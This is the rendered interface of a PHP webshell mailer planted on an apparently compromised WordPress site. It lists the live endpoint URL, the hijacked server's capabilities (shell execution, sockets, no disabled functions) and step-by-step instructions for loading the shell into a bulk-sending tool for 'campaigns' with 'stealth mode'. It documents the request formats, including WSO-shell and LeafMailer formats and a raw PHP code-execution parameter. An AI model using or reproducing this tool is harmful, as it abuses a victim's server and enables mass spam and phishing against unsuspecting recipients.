๐Ÿ—ก๏ธ ENUMA ELISH WEBSHELL MAILER ๐Ÿ—ก๏ธ

Ultimate Email Warfare System - v2.0

Enhanced Integration with ENUMA ELISH SENDER

๐Ÿ“ก Status
ONLINE & READY
๐Ÿ•’ Server Time
2025-11-18 21:55:12
๐ŸŒ Host
elspaziohomes.com
๐Ÿ”ง PHP Version
7.0.33

๐Ÿ”— ENUMA ELISH SENDER Integration

Ready for integration! This webshell mailer is fully compatible with ENUMA ELISH SENDER.

๐Ÿ“ก API Endpoint:
https://elspaziohomes.com/wp-includes/js/crop/enum.php7

Usage: Add the above URL to your ENUMA ELISH SENDER webshell list for instant integration.

๐Ÿงช Quick Test
๐Ÿ“ง Send Email
๐Ÿ”ง Capabilities
๐Ÿ”— Integration Guide
๐Ÿ“‹ API Documentation

๐Ÿงช Quick System Test

Test the mailer functionality and verify ENUMA ELISH SENDER compatibility.

๐Ÿ“ง Manual Email Sending

Send a single email using the advanced mailer system.

๐Ÿ”ง Server Capabilities

Current server capabilities and supported features:

Php Version

7.0.33

Server Software

LiteSpeed

Server Name

elspaziohomes.com

Document Root

/home/shopbiby/elspaziohomes.com

Mail Function

โœ… Available

Mb Send Mail

โœ… Available

Curl Support

โœ… Available

Openssl Support

โœ… Available

Socket Support

โœ… Available

Popen Support

โœ… Available

Shell Exec Support

โœ… Available

File Functions

โœ… Available

Sendmail Path

/usr/sbin/sendmail -t -i

Max Execution Time

0

Memory Limit

32M

Safe Mode

Off

Open Basedir

None

Disable Functions

None

๐Ÿ”— ENUMA ELISH SENDER Integration Guide

๐Ÿ“‹ Step-by-Step Integration:

  1. Copy the API Endpoint:
    https://elspaziohomes.com/wp-includes/js/crop/enum.php7
  2. Open ENUMA ELISH SENDER
  3. Navigate to: "Load Webshells & Mailers"
  4. Add the URL to your webshell list file
  5. Run Auto-Detection - The system will automatically detect this as a compatible mailer
  6. Test the Integration - Use the mass test feature to verify functionality
  7. Start Bulk Campaigns - Use in your advanced bulk email campaigns

โš ๏ธ Important Notes:

  • This mailer supports all ENUMA ELISH SENDER request formats
  • Automatic fallback methods ensure high delivery rates
  • Stealth mode is enabled by default for security
  • All activities are logged for debugging purposes

๐ŸŽฏ Supported Request Formats:

  • WSO Shell Format: a=Mail, p1=to, p2=subject, p3=body, p4=from
  • LeafMailer Format: leafmailer_action=send_mail, recipient=to, title=subject
  • Generic Format: action=send, to=email, subject=subject, body=message
  • PHP Code Execution: cmd=mail(...) with proper parameter extraction
  • JSON API Format: Full JSON payload support

๐Ÿ“‹ API Documentation

๐Ÿ”— Endpoint Information:

Base URL: https://elspaziohomes.com/wp-includes/js/crop/enum.php7

๐Ÿ“ก Supported Actions:

1. Send Single Email (JSON)
POST /wp-includes/js/crop/enum.php7Content-Type: application/json

{
    "action": "send",
    "to": "recipient@example.com",
    "subject": "Email Subject",
    "body": "Email content (HTML supported)",
    "from_email": "sender@example.com",
    "from_name": "Sender Name",
    "reply_to": "reply@example.com"
}
2. WSO Shell Format
POST /wp-includes/js/crop/enum.php7Content-Type: application/x-www-form-urlencoded

a=Mail&p1=recipient@example.com&p2=Subject&p3=Message&p4=sender@example.com
3. LeafMailer Format
POST /wp-includes/js/crop/enum.php7Content-Type: application/x-www-form-urlencoded

leafmailer_action=send_mail&recipient=recipient@example.com&title=Subject&content=Message&from=sender@example.com
4. PHP Code Execution
POST /wp-includes/js/crop/enum.php7Content-Type: application/x-www-form-urlencoded

cmd=mail("recipient@example.com", "Subject", "Message", "From: sender@example.com");
5. System Test
POST /wp-includes/js/crop/enum.php7Content-Type: application/json

{
    "action": "test",
    "email": "test@example.com"
}

๐Ÿ“ค Response Format:

{
    "status": "success|error",
    "message": "Descriptive message",
    "timestamp": "2025-01-XX XX:XX:XX",
    "server": "your-domain.com",
    "data": {
        "method": "native_mail|smtp|advanced_bypass",
        "attempt": 1,
        "to": "recipient@example.com"
    },
    "enuma_sent_success": true,
    "delivery_status": "sent"
}

๐Ÿ”ง ENUMA ELISH SENDER Compatibility:

  • โœ… Automatic detection and classification
  • โœ… Multiple request format support
  • โœ… Enhanced response markers for success detection
  • โœ… Fallback delivery methods for high success rates
  • โœ… Stealth mode operation
  • โœ… Comprehensive error handling
  • โœ… Real-time logging and debugging